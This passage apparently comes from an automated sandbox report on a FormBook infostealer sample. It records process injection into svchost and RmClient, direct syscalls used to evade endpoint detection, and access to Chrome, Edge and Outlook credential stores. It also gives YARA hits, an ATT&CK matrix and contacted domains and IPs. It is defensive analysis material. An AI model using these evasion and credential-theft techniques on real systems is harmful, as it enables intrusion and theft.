            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RmClient.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\RmClient.exeThread register set: target process: 3180Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\RmClient.exeThread APC queued: target process: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2DE5008Jump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\enkJ6J7dAn.exe"Jump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeProcess created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259788515.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589521835.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4589842860.00000000019A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: enkJ6J7dAn.exe, avmjQSNkeFbUoa.exe, 00000003.00000000.2259788515.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589521835.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4589842860.00000000019A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259788515.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589521835.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4589842860.00000000019A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259788515.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589521835.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4589842860.00000000019A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: enkJ6J7dAn.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,0_2_0041E364
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\RmClient.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: enkJ6J7dAn.exeBinary or memory string: WIN_XP
            Source: enkJ6J7dAn.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: enkJ6J7dAn.exeBinary or memory string: WIN_XPe
            Source: enkJ6J7dAn.exeBinary or memory string: WIN_VISTA
            Source: enkJ6J7dAn.exeBinary or memory string: WIN_7
            Source: enkJ6J7dAn.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529036 Sample: enkJ6J7dAn.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 28 www.uburn.xyz 2->28 30 www.nakama2-sshl.xyz 2->30 32 22 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 3 other signatures 2->50 10 enkJ6J7dAn.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 avmjQSNkeFbUoa.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 RmClient.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 avmjQSNkeFbUoa.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.uburn.xyz 67.223.117.189, 49980, 49981, 49982 VIMRO-AS15189US United States 22->34 36 www.nakama2-sshl.xyz 183.181.83.131, 49988, 49989, 49990 VECTANTARTERIANetworksCorporationJP Japan 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            enkJ6J7dAn.exe71%ReversingLabsWin32.Backdoor.FormBook
            enkJ6J7dAn.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
